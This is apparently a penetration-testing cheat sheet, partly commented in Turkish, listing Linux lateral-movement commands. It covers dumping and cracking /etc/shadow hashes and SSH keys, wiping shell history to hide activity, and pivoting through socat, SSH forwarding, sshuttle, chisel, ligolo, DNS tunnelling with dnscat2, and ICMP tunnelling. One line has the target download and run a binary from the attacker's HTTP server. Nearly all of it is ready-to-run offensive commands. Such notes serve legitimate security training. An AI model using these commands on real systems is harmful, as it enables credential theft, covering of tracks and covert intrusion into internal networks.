Linux Lateral Movement

Hash Dumping

cat /etc/shadow > shadow.txt
john --format=sha512crypt shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 shadow.txt /usr/share/wordlists/rockyou.txt

ssh2john id_rsa > ssh.hash
sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'

History Silme

history -c
cat /dev/null > ~/.bash_history

Port Forwarding

# 8080 portunu dinler ve bütün trafiği 80 portuna yönlendirir
socat TCP4-LISTEN:8080,fork TCP4:192.168.1.4:80

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

SSH Tunneling

# Local port forwarding (Karşıdaki bir portu kendimize alma)
ssh -L 1234:localhost:3306 root@192.168.1.3

# Dynamic Port Forwarding (Karşıdaki bütün portları kendimize alma)
ssh -D 9999 root@192.168.1.3
mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999
proxychains nmap -sT -Pn 172.168.1.3

# Remote Port Forward (Kendi Portumuzu karşıya yönlendirme)
ssh -R 10.0.0.3:8080:0.0.0.0:80 ubuntu@192.168.1.3 -vN

# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999
proxychains nmap -v -sT -Pn -n 172.168.1.3

# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24

Chisel

./chisel server --port 8081 --reverse # Kali

./chisel.exe client 192.168.1.2:8081 R:socks # Target
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 1080

./chisel.exe client 192.168.1.2:8081 R:3307:127.0.0.1:3306 # Hedef:3306 > Kali:3307


# Hedefte Shell için Port Açma
./chisel.exe server --port 8081 --reverse # Hedef
./chisel client 192.168.1.3:8081 R:8080:0.0.0.0:80 # Kali:8080 > Hedef:80

Ligolo

./proxy -selfcert -laddr 0.0.0.0:443
./agent -ignore-cert -connect 192.168.1.2:443

interface_create --name ligolo
route_add --name ligolo --route 240.0.0.1/32 # Localhost 
route_add --name ligolo --route 10.0.0.1/24 # Subnet
tunnel_start # Tünellemeyi başlatır

# Hedefte 1234 portunu açar ve dinler istekleri bizdeki 4321'e yönlendirir.
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

DNS Tunneling

mousepad dnsmasq.conf
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts

# Define the zone
auth-zone=feline.corp
auth-server=feline.corp

# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.


dnsmasq -C dnsmasq.conf -d


# Local
dnscat2-server feline.corp
cp /usr/bin/dnscat .
python -m http.server 80

# Hedef
wget http://192.168.1.2/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat
/tmp/dnscat feline.corp

window -i 1
listen 0.0.0.0:4455 172.16.2.4:445

ICMP Tunneling

# Target
./ptunnel-ng -r10.129.202.64 -R22
# Kali
./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

PreviousLinux Persistence NextWeb Pentest Checklist

Last updated 6 months ago